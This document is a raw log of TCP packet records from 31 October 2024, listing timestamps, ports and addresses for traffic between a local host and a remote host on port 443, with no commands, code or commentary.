                                                                                                                                                                                                  Oct 31, 2024 18:05:23.405004025 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.405013084 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.405138969 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.405162096 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.406132936 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.406142950 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.406277895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.406277895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.406378031 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.406378031 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.406384945 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.406477928 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.406522036 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.422993898 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.423007011 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.423185110 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.423185110 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.423310995 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.423322916 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.423527002 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.424676895 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.424690008 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.424869061 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.424869061 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.424884081 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.424891949 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.424993992 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.424993992 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.562963963 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.563020945 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.563153982 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.563153982 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.563232899 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.563258886 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.563258886 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.563425064 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.563818932 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.563874960 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.564023972 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.564024925 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.564084053 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.564105988 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.564105988 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.564259052 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.564734936 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.564795971 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.564980030 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.564980030 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.565038919 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.565072060 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.565238953 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.565711021 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.565756083 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.565938950 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.565938950 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.565996885 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.566020966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.566245079 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.566685915 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.566742897 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.566884995 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.566884995 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.566950083 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.566950083 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.566950083 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.566984892 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.567209959 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.567795038 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.567852974 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.568104982 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.568160057 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.568408012 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.568629980 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.568675995 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.568819046 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.568819046 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.568882942 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.568882942 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.568882942 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.568914890 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.569154024 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.569569111 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.569626093 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.569829941 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.569829941 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.569830894 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.569830894 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.569894075 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.570110083 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.570674896 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.570730925 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.570916891 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.570967913 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.571002960 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.571155071 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.571883917 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.571939945 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.572069883 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.572117090 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.572118044 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.572150946 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.572180033 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.572396040 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.572984934 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.573031902 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.573159933 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.573201895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.573201895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.573201895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.573235989 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.573271990 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.573498011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.574064970 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.574121952 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.574263096 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.574264050 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.574264050 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.574327946 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.574361086 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.574361086 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.574536085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.574805021 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.574848890 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.574984074 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.574984074 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.575032949 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.575032949 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.575061083 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.575166941 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.575210094 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.575907946 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.575952053 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.576081991 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.576081991 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.576142073 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.576143026 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.576172113 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.576201916 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.576308966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.577410936 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.577455997 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.577614069 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.577615023 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.577676058 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.577702999 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.577786922 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.577857018 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.578890085 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.578941107 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.579052925 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.579052925 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.579116106 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.579116106 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.579159021 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.579186916 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.579360008 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.580383062 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.580439091 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.580574989 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.580574989 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.580636024 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.580636978 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.580666065 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.580789089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.580859900 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.581440926 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.581496954 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.581634045 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.581634045 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.581634045 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.581698895 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.581732035 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.581820965 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.582686901 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.582743883 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.582842112 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.582842112 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.582937956 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.582988024 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.583020926 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.583134890 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.583456039 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.583499908 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.583638906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.583682060 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.583682060 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.583714962 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.583746910 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.583894014 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.584194899 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.584240913 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.584378958 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.584422112 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.584422112 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.584423065 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.584458113 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.584492922 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.584702969 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.584985018 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.585026979 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.585186005 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.585186958 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.585235119 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.585235119 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.585235119 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.585264921 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.585484028 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.596765041 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.596823931 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.597003937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.597003937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.597003937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.597065926 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.597106934 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.597299099 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.598094940 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.598151922 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.598304033 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.598304033 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.598354101 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.598354101 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.598354101 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.598387003 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.598655939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.599253893 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.599311113 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.599519968 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.599519968 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.599519968 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.599576950 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.599868059 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.601120949 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.601190090 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.601346970 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.601347923 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.601347923 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.601409912 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.601432085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.601679087 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.602560043 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.602616072 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.602801085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.602801085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.602801085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.602866888 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.602885008 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.602885008 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.603224993 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.605683088 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.605741024 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.605901957 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.605901957 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.605964899 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.605993986 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.606290102 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.606985092 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.607039928 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.607253075 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.607253075 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.607253075 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.607316017 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.607522011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.608426094 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.608484983 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.608628988 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.608628988 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.608705044 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.608730078 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.608730078 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.608975887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.609436989 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.609494925 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.609664917 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.609666109 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.609724045 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.609756947 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.609982967 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.610536098 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.610591888 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.610779047 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.610831022 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.610863924 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.611032963 CET49755443192.168.11.2054.37.62.77
